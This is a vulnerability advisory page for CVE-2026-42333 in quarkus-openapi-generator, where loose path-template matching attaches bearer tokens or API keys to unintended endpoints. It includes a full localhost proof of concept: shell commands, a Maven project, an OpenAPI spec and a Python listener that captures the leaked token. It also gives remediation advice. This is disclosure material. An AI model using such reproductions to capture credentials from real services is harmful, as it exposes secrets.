quarkus-openapi-generator CVE-2026-42333
MEDIUMSeverity by source
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
3DescriptionGitHub Advisory
Summary
The generated authentication filter matches OpenAPI path templates too broadly when deciding whether to attach credentials. A security scheme configured for one operation can therefore be applied to a different same-method operation whose path only partially resembles the protected template, causing bearer tokens, API keys, or basic credentials to be sent to unintended endpoints.
Details
The runtime authentication layer selects credentials by comparing the outgoing request path and method against the set of protected OpenAPI operations. Path-template matching treats {param} placeholders as .*, which incorrectly allows a single path parameter to consume /.
As a result, a protected path such as /repos/{ref} also matches /repos/foo/bar, even though /repos/{owner}/{repo} is a different operation. When a client invokes the unprotected operation, the authentication filter still concludes that the protected operation matched and attaches its credentials.
This affects authentication providers that rely on the shared path-matching logic, including bearer, OAuth, API-key, and basic authentication. The issue is reachable through normal generated-client usage and does not require modifying generated code.
PoC
mkdir -p /tmp/qoag-poc/src/main/java/org/acme
mkdir -p /tmp/qoag-poc/src/main/resources
mkdir -p /tmp/qoag-poc/src/main/openapi
cat > /tmp/qoag-poc/pom.xml <<'EOF'
<project xmlns="http://maven.apache.org/POM/4.0.0"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
<modelVersion>4.0.0</modelVersion>
<groupId>org.acme</groupId>
<artifactId>qoag-poc</artifactId>
<version>1.0.0</version>
<properties>
<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
<maven.compiler.release>17</maven.compiler.release>
<quarkus.platform.group-id>io.quarkus</quarkus.platform.group-id>
<quarkus.platform.artifact-id>quarkus-bom</quarkus.platform.artifact-id>
<quarkus.platform.version>3.34.3</quarkus.platform.version>
<qoag.version>2.16.0</qoag.version>
</properties>
<dependencyManagement>
<dependencies>
<dependency>
<groupId>${quarkus.platform.group-id}</groupId>
<artifactId>${quarkus.platform.artifact-id}</artifactId>
<version>${quarkus.platform.version}</version>
<type>pom</type>
<scope>import</scope>
</dependency>
</dependencies>
</dependencyManagement>
<dependencies>
<dependency>
<groupId>io.quarkiverse.openapi.generator</groupId>
<artifactId>quarkus-openapi-generator</artifactId>
<version>${qoag.version}</version>
</dependency>
<dependency>
<groupId>io.quarkus</groupId>
<artifactId>quarkus-rest</artifactId>
</dependency>
<dependency>
<groupId>io.quarkus</groupId>
<artifactId>quarkus-rest-client-jackson</artifactId>
</dependency>
</dependencies>
<build>
<plugins>
<plugin>
<groupId>io.quarkus</groupId>
<artifactId>quarkus-maven-plugin</artifactId>
<version>${quarkus.platform.version}</version>
<extensions>true</extensions>
<executions>
<execution>
<goals>
<goal>build</goal>
<goal>generate-code</goal>
<goal>generate-code-tests</goal>
</goals>
</execution>
</executions>
</plugin>
<plugin>
<artifactId>maven-compiler-plugin</artifactId>
<version>3.14.0</version>
<configuration>
<parameters>true</parameters>
</configuration>
</plugin>
</plugins>
</build>
</project>
EOF
cat > /tmp/qoag-poc/src/main/openapi/repro.yaml <<'EOF'
openapi: 3.0.3
info:
title: repro
version: 1.0.0
paths:
/repos/{ref}:
get:
operationId: getRef
parameters:
- in: path
name: ref
required: true
schema:
type: string
security:
- bearerAuth: []
responses:
"200":
description: ok
content:
text/plain:
schema:
type: string
/repos/{owner}/{repo}:
get:
operationId: getOwnerRepo
parameters:
- in: path
name: owner
required: true
schema:
type: string
- in: path
name: repo
required: true
schema:
type: string
responses:
"200":
description: ok
content:
text/plain:
schema:
type: string
components:
securitySchemes:
bearerAuth:
type: http
scheme: bearer
EOF
cat > /tmp/qoag-poc/src/main/resources/application.properties <<'EOF'
quarkus.http.port=8081
quarkus.openapi-generator.codegen.default-security-scheme=bearerAuth
quarkus.openapi-generator.codegen.spec.repro_yaml.base-package=org.acme.repro
quarkus.rest-client.repro_yaml.url=http://127.0.0.1:18080
quarkus.openapi-generator.repro_yaml.auth.bearerAuth.bearer-token=SECRET
EOF
cat > /tmp/qoag-poc/src/main/java/org/acme/TriggerResource.java <<'EOF'
package org.acme;
import jakarta.ws.rs.GET;
import jakarta.ws.rs.Path;
import jakarta.ws.rs.Produces;
import jakarta.ws.rs.core.MediaType;
import org.eclipse.microprofile.rest.client.inject.RestClient;
@Path("/trigger")
public class TriggerResource {
@RestClient
org.acme.repro.api.DefaultApi api;
@GET
@Produces(MediaType.TEXT_PLAIN)
public String trigger() {
api.getOwnerRepo("foo", "bar");
return "done";
}
}
EOF
python - <<'PY' &
from http.server import BaseHTTPRequestHandler, HTTPServer
class H(BaseHTTPRequestHandler):
def do_GET(self):
print("PATH=" + self.path, flush=True)
print("AUTH=" + str(self.headers.get("Authorization")), flush=True)
self.send_response(200)
self.end_headers()
self.wfile.write(b"ok")
def log_message(self, fmt, *args):
pass
HTTPServer(("127.0.0.1", 18080), H).serve_forever()
PY
cd /tmp/qoag-poc
mvn -q package -DskipTests
java -jar target/quarkus-app/quarkus-run.jar &
sleep 8
curl -s http://127.0.0.1:8081/trigger
# PATH=/repos/foo/bar
# AUTH=Bearer SECRETImpact
Clients generated from an OpenAPI specification can send authentication credentials to endpoints that were not intended to receive them. In practice, this can disclose bearer tokens, API keys, or basic credentials to lower-trust routes on the same service, cause public operations to be invoked with privileged credentials, and blur the intended security boundary between protected and unprotected operations.
AnalysisAI
Quarkus OpenAPI Generator versions before 2.16.0-lts and 2.16.0 (fixed in 2.17.0) send authentication credentials to unintended API endpoints due to overly broad path-parameter regex matching. The generated authentication filter treats OpenAPI path-template placeholders like {param} as .* patterns, allowing a single parameter to consume forward slashes and match multiple distinct operations. This causes bearer tokens, OAuth tokens, API keys, and basic credentials configured for one protected operation to be leaked to different, unprotected operations on the same service when a client invokes them through normal generated-code paths. No public exploit code has been identified, but the vulnerability is trivial to trigger and affects all authentication schemes relying on the shared path-matching logic.
Technical ContextAI
The Quarkus OpenAPI Generator is a Maven plugin (io.quarkiverse.openapi.generator:quarkus-openapi-generator) that generates REST client code from OpenAPI specifications. At runtime, the generated authentication filter matches HTTP request paths against the set of OpenAPI operations that require credentials to decide whether to attach a security header. The flaw resides in the path-template regex conversion logic: OpenAPI path parameters specified as {param} are naively converted to .* patterns in regular expressions. This permits a single regex segment to consume path separators (/), causing /repos/{ref} to incorrectly match /repos/foo/bar even though /repos/{owner}/{repo} is a distinct operation with different semantics. The root cause is a failure to anchor or properly constrain the regex segments, violating the principle that OpenAPI path parameters should match single path segments only. This affects the shared authentication path-matching layer used by bearer token, OAuth 2.0, API key, and HTTP Basic authentication schemes. The issue is reachable through normal client instantiation without code modification, making it a supply-chain risk for any application using generated clients from affected versions.
RemediationAI
Upgrade quarkus-openapi-generator to version 2.16.0-lts (if on the LTS branch) or 2.17.0 or later (for the main release branch). Update the dependency version in pom.xml and rebuild the project to regenerate client code with the corrected path-matching logic. For applications already deployed with vulnerable generated clients, there is no runtime workaround-regeneration and redeployment are required. If immediate upgrade is blocked, a temporary compensating control is to restrict outbound access from the application to only the API server's base URL and specific endpoints, and to employ network-level credential filtering (e.g., WAF/proxy rules that detect and block leaked credentials in downstream requests), though this is fragile and does not address the root cause. Additionally, review OpenAPI specifications for overlapping path patterns (e.g., /repos/{ref} and /repos/{owner}/{repo}) that could trigger the bug; where possible, redesign endpoints to use completely distinct path prefixes to minimize the attack surface even with the vulnerable matcher. The advisory is available at https://github.com/quarkiverse/quarkus-openapi-generator/security/advisories/GHSA-fr8f-rwjx-f32v. Regeneration of client code is essential because the flaw is baked into the generated authentication filter at build time, not a library dependency that can be patched post-hoc.
Wazuh SIEM platform versions 4.4.0 through 4.9.0 contain an unsafe deserialization vulnerability in the DistributedAPI t
BentoML version 1.4.2 and earlier contains an unauthenticated remote code execution vulnerability through insecure deser
pgAdmin 4 contains critical remote code execution vulnerabilities in the Query Tool download and Cloud Deployment endpoi
The renderLocalView function in render/views.py in graphite-web in Graphite 0.9.5 through 0.9.10 uses the pickle Python
BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Rated critica
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCiph
pyLoad download manager version prior to 0.5.0b3.dev77 exposes the Flask SECRET_KEY through an unauthenticated endpoint.
In Mercurial before 4.1.3, "hg serve --stdio" allows remote authenticated users to launch the Python debugger, and conse
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
pyLoad is the free and open-source Download Manager written in pure Python. Rated medium severity (CVSS 5.3), this vulne
Langflow (a visual LLM pipeline builder) contains a critical unauthenticated code execution vulnerability (CVE-2026-3301
Cross-user flow execution in Langflow (< 1.9.1) lets any authenticated API-key holder run another user's flow by passing
Same weakness CWE-200 – Information Exposure
View allSame technique Information Disclosure
View allShare
External POC / Exploit Code
Leaving vuln.today
GHSA-fr8f-rwjx-f32v